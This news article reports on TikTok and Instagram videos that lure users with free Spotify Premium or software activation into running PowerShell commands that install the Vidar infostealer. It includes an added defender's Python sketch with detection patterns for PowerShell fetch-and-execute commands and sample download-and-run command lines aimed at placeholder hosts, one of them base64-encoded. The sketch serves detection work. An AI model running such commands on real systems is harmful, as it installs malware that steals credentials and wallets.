Hackers Disguise Malware as Free Spotify Premium in TikTok Videos

11.06.2026 5 minutes

A new study warns that cybercriminals are using viral “hacking” tutorials on TikTok and Instagram to trick users into downloading malware capable of stealing passwords, personal information, and even cryptocurrency wallet data.

Viral TikTok “Hacks” Are Spreading Malware

According to a new report from ReversingLabs, cybercriminals are luring users with short videos that promise free software activation and premium upgrades for popular services and applications, including Spotify Premium, Windows, Microsoft Office products such as Word, and Adobe Premiere.

“These campaigns, primarily conducted through TikTok and Instagram Reels, use the same template to mass-produce videos and publish content on a regular basis,” said Zaria Vuksan, a threat intelligence researcher at ReversingLabs.

Attackers are posting TikTok videos that offer free Spotify Premium subscriptions, tricking users into downloading malware instead.

Researchers say they uncovered two separate phishing campaigns that relied on short “hacking tutorial” videos distributed across multiple social media platforms. In both cases, users were directed to secondary websites that allegedly offered free software downloads.

“Both approaches serve different objectives, and the differences show how threat actors can leverage various aspects of social media engagement to reach a larger number of potential victims,” Vuksan said.

Password-Stealing Malware Hidden in Fake Downloads

The first tactic is relatively straightforward. Threat actors create polished videos featuring professional voiceovers, clean graphics, and convincing instructions, then repeatedly post them across platforms using multiple accounts.

In the Microsoft-themed scam, researchers found that fraudulent accounts used official Windows logos and profile names such as “windows.tips” and “window.insight” to appear trustworthy and legitimate.


Many of the accounts and videos also included carefully crafted descriptions and keyword hashtags to make them appear like legitimate customer support pages.

One of the fraudulent videos identified by ReversingLabs attracted more than 100,000 views and thousands of interactions, making it more valuable to recommendation algorithms and increasing the likelihood that it would appear in users’ feeds.

Once users engage with the content, they are instructed to copy and paste a specific command into Windows PowerShell, which is falsely presented as a way to unlock premium features or activate software for free.

The official Windows account (top) and the fraudulent WTips profile on TikTok.

“The video is short and concise, walking users step by step through how to access PowerShell from the Windows menu and what command to enter to supposedly unlock the free service,” the blog states.

Vuksan noted that non-technical users often do not fully understand command-line instructions and may assume they are legitimate.

“Threat actors rely on that misunderstanding,” she added.

Once executed, the PowerShell command delivers the next stage of the attack, downloading the powerful Vidar infostealer directly onto the victim’s device.
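For defenders, the paste-and-run step described above appears in process-creation or script-block logs as a PowerShell command line that both fetches remote content and executes it. The sketch below is an added example, not code from ReversingLabs or the original article: a heuristic triage of such command lines, including ones hidden behind `-EncodedCommand`. The function names, pattern lists and sample lines are constructed assumptions; the article does not reproduce the actual command used in the campaign.

```python
import base64
import re

# Heuristic indicators only; tune against your own telemetry before alerting on them.
FETCH = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|curl|wget|"
                   r"downloadstring|downloaddata|downloadfile|start-bitstransfer)\b", re.I)
EXEC = re.compile(r"\b(iex|invoke-expression|start-process)\b|\|\s*(powershell|pwsh)\b", re.I)
URL = re.compile(r"https?://[^\s'\"|;)]+", re.I)
ENC = re.compile(r"\s-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)

def expand_encoded(cmd: str) -> str:
    """Return cmd plus the decoded body of any -EncodedCommand argument."""
    out = cmd
    for flag, blob in ENC.findall(cmd):
        flag = flag.lower()
        # PowerShell accepts -e, -ec and any prefix of -EncodedCommand.
        if not ("encodedcommand".startswith(flag) or flag == "ec"):
            continue
        try:
            out += "\n" + base64.b64decode(blob, validate=True).decode("utf-16-le")
        except ValueError:
            pass  # not base64 / not UTF-16LE: scan the raw text only
    return out

def assess(cmd: str) -> dict:
    """Classify one PowerShell command line from process-creation logs."""
    text = expand_encoded(cmd)
    urls = URL.findall(text)
    fetch, run = FETCH.search(text), EXEC.search(text)
    if fetch and run:
        verdict = "download-and-execute"
    elif fetch and urls:
        verdict = "remote-fetch"
    else:
        verdict = "no-match"
    return {"verdict": verdict, "urls": urls, "encoded": text != cmd}

# Constructed sample command lines (not taken from the report); hosts are placeholders.
_PAYLOAD = 'IEX (New-Object Net.WebClient).DownloadString("http://cdn.example.invalid/a")'
SAMPLES = [
    'powershell.exe -NoProfile -Command "iex (irm https://activate.example.invalid/x)"',
    "powershell.exe -w hidden -enc " + base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode(),
    'powershell.exe -Command "iwr https://dl.example.invalid/setup.exe -OutFile s.exe"',
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(assess(line)["verdict"], "<-", line[:70])
```

A `download-and-execute` verdict on an interactive user session, rather than a management agent, is the case worth escalating; `remote-fetch` alone is common in legitimate admin scripts.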


Engagement Bait Turns Curiosity Into Clicks

The second phishing tactic relies on engagement bait, often showing someone demonstrating premium software features that they claim to have unlocked for free.

For example, the videos are typically presented as ordinary user-generated content accompanied by popular music, while falsely claiming that viewers can get Spotify Premium at no cost. These campaigns frequently span multiple videos.

The goal is to encourage curious viewers to leave comments asking how the trick works. This gives threat actors an opportunity to respond with instructions, links, or follow-up videos that ultimately direct users to malicious websites.

A fraudulent website promoting free Spotify Premium and other premium software offerings.

Vuksan says this strategy helps boost engagement and build trust with followers before directing them to carry out malicious actions.

The actual lure is introduced only after a profile begins gaining traction on TikTok or Instagram.

The researchers, who attempted to report the content without success, also noted that social media-based scams can be particularly difficult to counter.

“Users who recognize malicious intent, either through research or by encountering it themselves, may try to warn others in the comments. However, most platforms allow content creators to delete comments and block commenters,” the researchers said.

How to Avoid Fake “Free Software” Scams

Malwarebytes, which published its own analysis of the ReversingLabs findings, warns that the Vidar infostealer quietly steals sensitive information from infected devices, including:

  • Browser data — saved passwords, cookies, autofill information, and some two-factor authentication data.

  • System information — details about the infected device and installed software.

  • Login credentials — usernames and passwords for installed applications and services.

  • Cryptocurrency wallets — wallet data and private keys for various cryptocurrencies.

First identified in 2018, Vidar is designed to harvest information from compromised systems and send it back to servers controlled by attackers.

Malwarebytes advises users to never execute PowerShell or terminal commands obtained from untrusted sources, as these commands can be used to silently install malware and compromise a device.

Malwarebytes advises users to download applications and software only from official sources and trusted distribution channels.

Researchers also recommend treating social media “tips” with skepticism, as even seemingly legitimate accounts can be used to distribute malware. They advise users to rely on official channels, such as vendor websites and authorized applications, when subscribing to streaming services or downloading software.

Finally, they urge users to keep real-time antivirus protection up to date at all times, as modern security software can help detect and block malware and information-stealing threats before they are executed.
